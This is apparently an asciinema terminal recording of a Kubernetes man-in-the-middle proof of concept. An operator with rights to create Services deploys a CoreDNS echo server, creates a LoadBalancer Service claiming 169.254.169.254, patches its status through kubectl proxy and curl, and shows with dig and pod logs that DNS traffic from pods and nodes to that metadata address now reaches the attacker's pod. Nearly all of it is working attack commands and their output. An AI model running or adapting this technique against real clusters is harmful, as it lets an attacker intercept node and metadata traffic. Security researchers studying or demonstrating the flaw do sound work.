{"version": 2, "width": 118, "height": 55, "timestamp": 1578175478, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.236179, "o", "$ "]
[1.078568, "o", "# Deploy our mitm backend, here the attacker as full access to kubeproxy-mitm (create Deployment / create & patch Service LoadBalancer)\r\n"]
[1.094264, "o", "$ "]
[13.028463, "o", "kubectl apply -f - <<'EOF'\r\n"]
[13.028703, "o", "> apiVersion: v1\r\n"]
[13.028895, "o", "> kind: Namespace\r\n"]
[13.029007, "o", "> metadata:\r\n> "]
[13.029106, "o", "  name: kubeproxy-mitm\r\n"]
[13.029203, "o", "> ---\r\n"]
[13.029287, "o", "> "]
[13.029365, "o", "apiVersion: v1\r\n"]
[13.029438, "o", "> "]
[13.029513, "o", "kind: ConfigMap\r\n> "]
[13.029618, "o", "metadata:\r\n"]
[13.029701, "o", "> "]
[13.029848, "o", "  name: echoserver-dns\r\n> "]
[13.029988, "o", "  namespace: kubeproxy-mitm\r\n"]
[13.030174, "o", "> data:\r\n> "]
[13.030277, "o", "  Corefile: |\r\n> "]
[13.030395, "o", "    kubernetes.io:53 {\r\n"]
[13.030477, "o", "> "]
[13.030617, "o", "        errors\r\n"]
[13.030707, "o", ">         log\r\n"]
[13.030804, "o", ">         health\r\n"]
[13.03085, "o", "> "]
[13.031034, "o", "        ready\r\n"]
[13.031135, "o", ">         whoami\r\n"]
[13.031222, "o", ">     }\r\n> "]
[13.031346, "o", "---\r\n> "]
[13.031441, "o", "apiVersion: apps/v1\r\n"]
[13.031472, "o", "> "]
[13.031617, "o", "kind: Deployment\r\n"]
[13.031705, "o", "> metadata:\r\n> "]
[13.031821, "o", "  name: echoserver-dns\r\n"]
[13.031915, "o", "> "]
[13.032043, "o", "  namespace: kubeproxy-mitm"]
[13.032131, "o", "\r\n> "]
[13.032212, "o", "spec:\r\n"]
[13.03233, "o", ">   replicas: 1\r\n> "]
[13.032456, "o", "  selector:\r\n> "]
[13.0326, "o", "    matchLabels:\r\n> "]
[13.032753, "o", "      app: echoserver-dns\r\n> "]
[13.032893, "o", "  template:\r\n> "]
[13.033028, "o", "    metadata:\r\n> "]
[13.033172, "o", "      labels:\r\n> "]
[13.033335, "o", "        app: echoserver-dns\r\n"]
[13.033457, "o", ">     spec:\r\n> "]
[13.0336, "o", "      containers:\r\n> "]
[13.03364, "o", "      - args:\r\n"]
[13.033727, "o", "> "]
[13.034006, "o", "        - -conf\r\n>         - /etc/coredns/Corefile\r\n"]
[13.034067, "o", "> "]
[13.034634, "o", "        image: docker.io/coredns/coredns:1.6.0\r\n>         livenessProbe:\r\n> "]
[13.034872, "o", "          failureThreshold: 10\r\n> "]
[13.035037, "o", "          httpGet:\r\n> "]
[13.035132, "o", "            path: /health\r\n"]
[13.035227, "o", "> "]
[13.035309, "o", "            port: 8080\r\n> "]
[13.035442, "o", "            scheme: HTTP\r\n"]
[13.03555, "o", "> "]
[13.03565, "o", "          periodSeconds: 10\r\n"]
[13.035767, "o", "> "]
[13.035848, "o", "          successThreshold: 1\r\n"]
[13.035931, "o", "> "]
[13.036044, "o", "          timeoutSeconds: 5\r\n"]
[13.036127, "o", "> "]
[13.036155, "o", "        name: coredns\r\n"]
[13.036255, "o", "> "]
[13.036333, "o", "        ports:\r\n"]
[13.036407, "o", "> "]
[13.036484, "o", "        - containerPort: 53\r\n"]
[13.036569, "o", "> "]
[13.036634, "o", "          name: dns\r\n"]
[13.036704, "o", "> "]
[13.036793, "o", "          protocol: UDP\r\n"]
[13.036881, "o", "> "]
[13.036973, "o", "        - containerPort: 53\r\n"]
[13.037041, "o", "> "]
[13.037144, "o", "          name: dns-tcp\r\n"]
[13.037219, "o", "> "]
[13.037326, "o", "          protocol: TCP\r\n"]
[13.037398, "o", "> "]
[13.037577, "o", "        readinessProbe:\r\n> "]
[13.037674, "o", "          failureThreshold: 10\r\n"]
[13.037787, "o", "> "]
[13.037874, "o", "          httpGet:\r\n> "]
[13.037981, "o", "            path: /ready\r\n"]
[13.038065, "o", "> "]
[13.038136, "o", "            port: 8181\r\n"]
[13.038215, "o", "> "]
[13.03831, "o", "            scheme: HTTP\r\n"]
[13.038405, "o", "> "]
[13.038486, "o", "          periodSeconds: 10\r\n"]
[13.038528, "o", "> "]
[13.038644, "o", "          successThreshold: 1\r\n"]
[13.038725, "o", "> "]
[13.038814, "o", "          timeoutSeconds: 5\r\n"]
[13.038848, "o", "> "]
[13.038951, "o", "        securityContext:\r\n"]
[13.039028, "o", "> "]
[13.039163, "o", "          allowPrivilegeEscalation: false\r\n"]
[13.039234, "o", "> "]
[13.039327, "o", "          capabilities:\r\n"]
[13.039403, "o", "> "]
[13.03948, "o", "            add:\r\n> "]
[13.039601, "o", "            - NET_BIND_SERVICE\r\n"]
[13.039675, "o", "> "]
[13.039746, "o", "            drop:\r\n"]
[13.039774, "o", "> "]
[13.039857, "o", "            - all\r\n"]
[13.039886, "o", "> "]
[13.040051, "o", "          readOnlyRootFilesystem: true\r\n"]
[13.040144, "o", "> "]
[13.040323, "o", "        terminationMessagePath: /dev/termination-log\r\n"]
[13.040494, "o", "> "]
[13.040538, "o", "        terminationMessagePolicy: File\r\n"]
[13.040781, "o", ">         volumeMounts:\r\n> "]
[13.041056, "o", "        - mountPath: /etc/coredns\r\n"]
[13.041217, "o", "> "]
[13.041306, "o", "          name: config-volume\r\n"]
[13.041331, "o", "> "]
[13.041426, "o", "      volumes:\r\n> "]
[13.041509, "o", "      - configMap:\r\n"]
[13.041674, "o", ">           defaultMode: 420\r\n"]
[13.041767, "o", "> "]
[13.04184, "o", "          items:\r\n> "]
[13.041939, "o", "          - key: Corefile\r\n"]
[13.042024, "o", "> "]
[13.042125, "o", "            path: Corefile\r\n"]
[13.042677, "o", ">           name: echoserver-dns\r\n>         name: config-volume\r\n> EOF\r\n"]
[13.870375, "o", "namespace/kubeproxy-mitm created\r\n"]
[14.15018, "o", "configmap/echoserver-dns created\r\n"]
[14.453896, "o", "deployment.apps/echoserver-dns created\r\n"]
[14.480508, "o", "$ "]
[19.420376, "o", "# Here the MITM, this will redirect dns traffic normally destined to 169.254.169.254 to our echoserver-dns"]
[20.778292, "o", "\r\n"]
[20.794664, "o", "$ "]
[30.434527, "o", "kubectl apply -f - <<'EOF'\r\n"]
[30.434748, "o", "> apiVersion: v1\r\n"]
[30.434857, "o", "> "]
[30.434967, "o", "kind: Service\r\n> "]
[30.435067, "o", "metadata:\r\n> "]
[30.435145, "o", "  name: mitm-external-lb-dns\r\n"]
[30.435186, "o", "> "]
[30.43529, "o", "  namespace: kubeproxy-mitm\r\n"]
[30.435416, "o", "> spec:\r\n>   ports:"]
[30.435531, "o", "\r\n> "]
[30.43561, "o", "  - name: dnsu\r\n"]
[30.435672, "o", "> "]
[30.435695, "o", "    port: 53\r\n"]
[30.435787, "o", "> "]
[30.435821, "o", "    targetPort: 53\r\n"]
[30.435912, "o", "> "]
[30.435947, "o", "    protocol: UDP\r\n"]
[30.435973, "o", "> "]
[30.436116, "o", "  selector:\r\n> "]
[30.436207, "o", "    app: echoserver-dns\r\n"]
[30.436278, "o", "> "]
[30.436345, "o", "  type: LoadBalancer\r\n"]
[30.436407, "o", "> "]
[30.436506, "o", "  loadBalancerIP: 169.254.169.254\r\n"]
[30.4366, "o", "> EOF"]
[33.142915, "o", "\r\n"]
[34.270331, "o", "service/mitm-external-lb-dns created\r\n"]
[36.868101, "o", "\r\n"]
[37.979208, "o", "kubectl get -n kubeproxy-mitm service/mitm-external-lb-dns"]
[38.471732, "o", "\r\n"]
[38.850416, "o", "NAME                   TYPE           CLUSTER-IP      EXTERNAL-IP   PORT(S)        AGE"]
[38.850602, "o", "\r\nmitm-external-lb-dns   LoadBalancer   10.23.243.194   <pending>     53:32449/UDP   5s\r\n"]
[38.870988, "o", "$ "]
[42.679101, "o", "\r\n"]
[42.695613, "o", "$ "]
[46.282473, "o", "# We need to patch the service so it's not pending anymore"]
[46.904476, "o", "\r\n"]
[46.920941, "o", "$ "]
[47.98336, "o", "\r\n"]
[54.310558, "o", "kubectl proxy --port=8080 &\r\n"]
[54.310998, "o", "[1] 286354\r\n"]
[54.328756, "o", "$ sleep 3\r\n"]
[54.392744, "o", "Starting to serve on 127.0.0.1:8080\r\n"]
[57.349243, "o", "$ "]
[57.35188, "o", "curl -k -v -XPATCH  -H \"Accept: application/json\" -H \"Content-Type: application/merge-patch+json\" 'http://127.0.0.1:8080/api/v1/namespaces/kubeproxy-mitm/services/mitm-external-lb-dns/status' -d '{\"status\":{\"loadBalancer\":{\"ingress\":[{\"ip\":\"169.254.169.254\"}]}}}'\r\n"]
[57.394894, "o", "*   Trying 127.0.0.1:8080...\r\n* TCP_NODELAY set\r\n"]
[57.395685, "o", "* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)\r\n> PATCH /api/v1/namespaces/kubeproxy-mitm/services/mitm-external-lb-dns/status HTTP/1.1\r\r\n> Host: 127.0.0.1:8080\r\r\n> User-Agent: curl/7.66.0\r\r\n> Accept: application/json\r\r\n> Content-Type: application/merge-patch+json\r\r\n> Content-Length: 66\r\r\n> \r\r\n* upload completely sent off: 66 out of 66 bytes\r\n"]
[57.827832, "o", "* Mark bundle as not supporting multiuse\r\n< HTTP/1.1 200 OK\r\r\n< Audit-Id: 58587ef7-9657-40f7-a1b5-fb920fac93a5\r\r\n< "]
[57.828212, "o", "Content-Length: 1408\r\r\n< Content-Type: application/json\r\r\n< Date: Sat, 04 Jan 2020 22:05:36 GMT\r\r\n< \r\r\n{\r\n  \"kind\": \"Service\",\r\n  \"apiVersion\": \"v1\",\r\n  \"metadata\": {\r\n    \"name\": \"mitm-external-lb-dns\",\r\n    \"namespace\": \"kubeproxy-mitm\",\r\n    \"selfLink\": \"/api/v1/namespaces/kubeproxy-mitm/services/mitm-external-lb-dns/status\",\r\n    \"uid\": \"1f09d303-1fd7-4a87-bb9f-f71f9ef23c56\",\r\n    \"resourceVersion\": \"15862\",\r\n    \"creationTimestamp\": \"2020-01-04T22:05:12Z\",\r\n    \"annotations\": {\r\n      \"kubectl.kubernetes.io/last-applied-configuration\": \"{\\\"apiVersion\\\":\\\"v1\\\",\\\"kind\\\":\\\"Service\\\",\\\"metadata\\\":{\\\"annotations\\\":{},\\\"name\\\":\\\"mitm-external-lb-dns\\\",\\\"namespace\\\":\\\"kubeproxy-mitm\\\"},\\\"spec\\\":{\\\"loadBalancerIP\\\":\\\"169.254.169.254\\\",\\\"ports\\\":[{\\\"name\\\":\\\"dnsu\\\",\\\"port\\\":53,\\\"protocol\\\":\\\"UDP\\\",\\\"targetPort\\\":53}],\\\"selector\\\":{\\\"app\\\":\\\"echoserver-dns\\\"},\\\"type\\\":\\\"LoadBalancer\\\"}}\\n\"\r\n    },\r\n    \"finalizers\": [\r\n      \"service.kubernetes.io/load-balancer-cleanup\"\r\n    ]\r\n  },\r\n  \"spec\": {\r\n    \"ports\": [\r\n "]
[57.828295, "o", "     {\r\n        \"name\": \"dnsu\",\r\n        \"protocol\": \"UDP\",\r\n        \"port\": 53,\r\n        \"targetPort\": 53,\r\n        \"nodePort\": 32449\r\n      }\r\n    ],\r\n    \"selector\": {\r\n      \"app\": \"echoserver-dns\"\r\n    },\r\n    \"clusterIP\": \"10.23.243.194\",\r\n    \"type\": \"LoadBalancer\",\r\n    \"sessionAffinity\": \"None\",\r\n    \"loadBalancerIP\": \"169.254.169.254\",\r\n    \"externalTrafficPolicy\": \"Cluster\"\r\n  },\r\n  \"status\": {\r\n    \"loadBalancer\": {\r\n      \"ingress\": [\r\n        {\r\n          \"ip\": \"169.254.169.254\"\r\n        }\r\n"]
[57.829082, "o", "      ]\r\n    }\r\n  }\r\n* Connection #0 to host 127.0.0.1 left intact\r\n}"]
[57.849238, "o", "$ pkill kubectl\r\n"]
[57.890044, "o", "[1]+  Complété              kubectl proxy --port=8080\r\n"]
[57.890304, "o", "$ "]
[61.548329, "o", "\r\n"]
[61.565163, "o", "$ "]
[71.124105, "o", "#"]
[71.469464, "o", " "]
[72.291582, "o", "T"]
[72.499585, "o", "e"]
[72.651718, "o", "s"]
[72.68374, "o", "t"]
[73.169365, "o", " "]
[74.296554, "o", "t"]
[74.366572, "o", "h"]
[75.570616, "o", "a"]
[75.654769, "o", "t"]
[75.716795, "o", " "]
[76.121372, "o", "o"]
[76.151295, "o", "u"]
[76.376996, "o", "r"]
[76.449116, "o", " "]
[76.927934, "o", "M"]
[77.107583, "o", "I"]
[77.391159, "o", "T"]
[77.843618, "o", "M"]
[78.386057, "o", " "]
[78.807673, "o", "w"]
[79.469038, "o", "o"]
[79.469665, "o", "rk"]
[79.543194, "o", "s"]
[81.715659, "o", "\r\n"]
[81.732455, "o", "$ "]
[83.948778, "o", "kubectl exec dig-pod -- dig kubernetes.io\r\n"]
[85.007198, "o", "\r\n; <<>> DiG 9.10.2 <<>> kubernetes.io\r\n;; global options: +cmd\r\n;; Got answer:\r\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51797\r\n;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 3\r\n\r\n;; OPT PSEUDOSECTION:\r\n; EDNS: version: 0, flags:; udp: 4096\r\n;; QUESTION SECTION:\r\n;kubernetes.io.\t\t\tIN\tA\r\n\r\n;; ADDITIONAL SECTION:\r\nkubernetes.io.\t\t0\tIN\tA\t10.128.0.20\r\n_udp.kubernetes.io.\t0\tIN\tSRV\t0 0 17052 .\r\n\r\n;; Query time: 2 msec\r\n;; SERVER: 10.23.240.10#53(10.23.240.10)\r\n;; WHEN: Sat Jan 04 22:06:03 UTC 2020\r\n;; MSG SIZE  rcvd: 108\r\n\r\n"]
[85.044842, "o", "$ "]
[85.044964, "o", "kubectl exec dig-node -- dig kubernetes.io\r\n"]
[86.229565, "o", "\r\n; <<>> DiG 9.10.2 <<>> kubernetes.io\r\n;; global options: +cmd\r\n;; Got answer:\r\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6856\r\n;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 3\r\n;; WARNING: recursion requested but not available\r\n\r\n;; OPT PSEUDOSECTION:\r\n; EDNS: version: 0, flags:; udp: 4096\r\n;; QUESTION SECTION:\r\n;kubernetes.io.\t\t\tIN\tA\r\n\r\n;; ADDITIONAL SECTION:\r\nkubernetes.io.\t\t0\tIN\tA\t10.20.0.1\r\n_udp.kubernetes.io.\t0\tIN\tSRV\t0 0 44475 .\r\n\r\n;; Query time: 0 msec\r\n;; SERVER: 169.254.169.254#53(169.254.169.254)\r\n;; WHEN: Sat Jan 04 22:06:04 UTC 2020\r\n;; MSG SIZE  rcvd: 108\r\n\r\n"]
[86.250225, "o", "$ "]
[86.250742, "o", "kubectl exec dig-pod -- dig kubernetes.io @169.254.169.254\r\n"]
[87.18429, "o", "\r\n; <<>> DiG 9.10.2 <<>> kubernetes.io @169.254.169.254\r\n;; global options: +cmd\r\n;; Got answer:\r\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35154\r\n;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 3\r\n;; WARNING: recursion requested but not available\r\n\r\n;; OPT PSEUDOSECTION:\r\n; EDNS: version: 0, flags:; udp: 4096\r\n;; QUESTION SECTION:\r\n;kubernetes.io.\t\t\tIN\tA\r\n\r\n;; ADDITIONAL SECTION:\r\nkubernetes.io.\t\t0\tIN\tA\t10.20.0.1\r\n_udp.kubernetes.io.\t0\tIN\tSRV\t0 0 34474 .\r\n\r\n;; Query time: 0 msec\r\n;; SERVER: 169.254.169.254#53(169.254.169.254)\r\n;; WHEN: Sat Jan 04 22:06:05 UTC 2020\r\n;; MSG SIZE  rcvd: 108\r\n\r\n"]
[87.274422, "o", "$ "]
[87.274896, "o", "kubectl exec dig-node -- dig kubernetes.io @169.254.169.254\r\n"]
[88.196632, "o", "\r\n; <<>> DiG 9.10.2 <<>> kubernetes.io @169.254.169.254\r\n;; global options: +cmd\r\n;; Got answer:\r\n;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6388\r\n;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 3\r\n;; WARNING: recursion requested but not available\r\n\r\n;; OPT PSEUDOSECTION:\r\n; EDNS: version: 0, flags:; udp: 4096\r\n;; QUESTION SECTION:\r\n;kubernetes.io.\t\t\tIN\tA\r\n\r\n;; ADDITIONAL SECTION:\r\nkubernetes.io.\t\t0\tIN\tA\t10.20.0.1\r\n_udp.kubernetes.io.\t0\tIN\tSRV\t0 0 59355 .\r\n\r\n;; Query time: 0 msec\r\n;; SERVER: 169.254.169.254#53(169.254.169.254)\r\n;; WHEN: Sat Jan 04 22:06:06 UTC 2020\r\n;; MSG SIZE  rcvd: 108\r\n\r\n"]
[88.270554, "o", "$ "]
[98.28871, "o", "\r\n"]
[98.305735, "o", "$ "]
[102.099025, "o", "kubectl get all -n kubeproxy-mitm\r\n"]
[104.75653, "o", "NAME                                  READY   STATUS    RESTARTS   "]
[104.756717, "o", "AGE\r\npod/echoserver-dns-54f86fd45c-dprlf   1/1     Running   0          17m\r\n"]
[104.757433, "o", "\r\nNAME                           "]
[104.757679, "o", "TYPE           CLUSTER-IP      EXTERNAL-IP       PORT(S)        AGE\r\nservice/mitm-external-lb-dns   LoadBalancer   10.23.243.194   169.254.169.254   53:32449/UDP   17m\r\n"]
[104.758487, "o", "\r\nNAME                        "]
[104.75873, "o", "     READY   UP-TO-DATE   AVAILABLE   AGE\r\ndeployment.apps/echoserver-dns   1/1     1        "]
[104.759267, "o", "    1           17m\r\n\r\nNAME                                        DESIRED"]
[104.760115, "o", "   CURRENT   READY   AGE\r\nreplicaset.apps/echoserver-dns-54f86fd45c   1         1         1       17m\r\n"]
[104.79073, "o", "$ "]
[106.077194, "o", "\r\n"]
[106.095055, "o", "$ "]
[112.891236, "o", "kubectl logs -n kubeproxy-mitm pod/echoserver-dns-54f86fd45c-dprlf"]
[113.309598, "o", "\r\n"]
[114.103153, "o", "kubernetes.io.:53\r\n2020-01-04T22:04:55.012Z [INFO] CoreDNS-1.6.0\r\n2020-01-04T22:04:55.013Z [INFO] linux/amd64, go1.12.7, 0a218d3\r\nCoreDNS-1.6.0\r\nlinux/amd64, go1.12.7, 0a218d3\r\n2020-01-04T22:06:03.633Z [INFO] 10.128.0.20:17052 - 39133 \"A IN kubernetes.io. udp 42 false 4096\" NOERROR qr,aa,rd 97 0.000170051s\r\n2020-01-04T22:06:04.796Z [INFO] 10.20.0.1:44475 - 6856 \"A IN kubernetes.io. udp 42 false 4096\" NOERROR qr,aa,rd 97 0.00016372s\r\n2020-01-04T22:06:05.827Z [INFO] 10.20.0.1:34474 - 35154 \"A IN kubernetes.io. udp 42 false 4096\" NOERROR qr,aa,rd 97 0.000191131s\r\n2020-01-04T22:06:05.830Z [INFO] 10.20.0.1:34474 - 35154 \"A IN kubernetes.io. udp 42 false 4096\" NOERROR qr,aa,rd 97 0.003379284s\r\n2020-01-04T22:06:06.837Z [INFO] 10.20.0.1:59355 - 6388 \"A IN kubernetes.io. udp 42 false 4096\" NOERROR qr,aa,rd 97 0.000114766s\r\n"]
[114.124221, "o", "$ "]
[131.778064, "o", "\r\n"]
[131.794553, "o", "$ "]
[133.333789, "o", "exit\r\n"]
